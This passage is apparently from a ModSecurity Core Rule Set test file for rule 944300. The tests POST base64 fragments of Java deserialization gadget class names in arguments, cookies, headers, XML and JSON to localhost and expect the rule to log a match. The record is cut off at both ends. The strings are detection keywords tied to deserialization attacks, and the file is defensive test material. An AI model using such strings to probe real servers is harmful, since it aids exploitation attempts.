dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-193 - desc: "XML element value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-194 - desc: "Nested XML element value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-195 - desc: "Content-Type text/plain includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-196 - desc: "Content-Type application/json arg value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-197 - desc: "Content-Type application/json arg name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-198 - desc: "Argument test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=aW52b2tlcnRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-199 - desc: "Argument name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "aW52b2tlcnRyYW5zZm9ybWVy=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-200 - desc: "Cookie test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=aW52b2tlcnRyYW5zZm9ybWVy - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-201 - desc: "Cookie name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: aW52b2tlcnRyYW5zZm9ybWVy=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-202 - desc: "Request header test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: aW52b2tlcnRyYW5zZm9ybWVy - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-203 - desc: "XML attribute value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-204 - desc: "XML element value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "aW52b2tlcnRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-205 - desc: "Nested XML element value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "aW52b2tlcnRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-206 - desc: "Content-Type text/plain includes keyword aW52b2tlcnRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=aW52b2tlcnRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-207 - desc: "Content-Type application/json arg value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"aW52b2tlcnRyYW5zZm9ybWVy\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-208 - desc: "Content-Type application/json arg name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"aW52b2tlcnRyYW5zZm9ybWVy\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-209 - desc: "Argument test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-210 - desc: "Argument name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "Gludm9rZXJ0cmFuc2Zvcm1lcg=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-211 - desc: "Cookie test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Gludm9rZXJ0cmFuc2Zvcm1lcg - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-212 - desc: "Cookie name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Gludm9rZXJ0cmFuc2Zvcm1lcg=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-213 - desc: "Request header test includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Gludm9rZXJ0cmFuc2Zvcm1lcg - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-214 - desc: "XML attribute value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-215 - desc: "XML element value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-216 - desc: "Nested XML element value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-217 - desc: "Content-Type text/plain includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-218 - desc: "Content-Type application/json arg value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"Gludm9rZXJ0cmFuc2Zvcm1lcg\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-219 - desc: "Content-Type application/json arg name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"Gludm9rZXJ0cmFuc2Zvcm1lcg\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-220 - desc: "Argument test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=BpbnZva2VydHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-221 - desc: "Argument name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "BpbnZva2VydHJhbnNmb3JtZXI=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-222 - desc: "Cookie test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=BpbnZva2VydHJhbnNmb3JtZXI - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-223 - desc: "Cookie name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: BpbnZva2VydHJhbnNmb3JtZXI=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-224 - desc: "Request header test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BpbnZva2VydHJhbnNmb3JtZXI - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-225 - desc: "XML attribute value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-226 - desc: "XML element value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "BpbnZva2VydHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-227 - desc: "Nested XML element value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "BpbnZva2VydHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-228 - desc: "Content-Type text/plain includes keyword BpbnZva2VydHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=BpbnZva2VydHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-229 - desc: "Content-Type application/json arg value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"BpbnZva2VydHJhbnNmb3JtZXI\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-230 - desc: "Content-Type application/json arg name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"BpbnZva2VydHJhbnNmb3JtZXI\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-231 - desc: "Argument test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-232 - desc: "Argument name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-233 - desc: "Cookie test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=cHJvdG90eXBlY2xvbmVmYWN0b3J5 - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-234 - desc: "Cookie name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 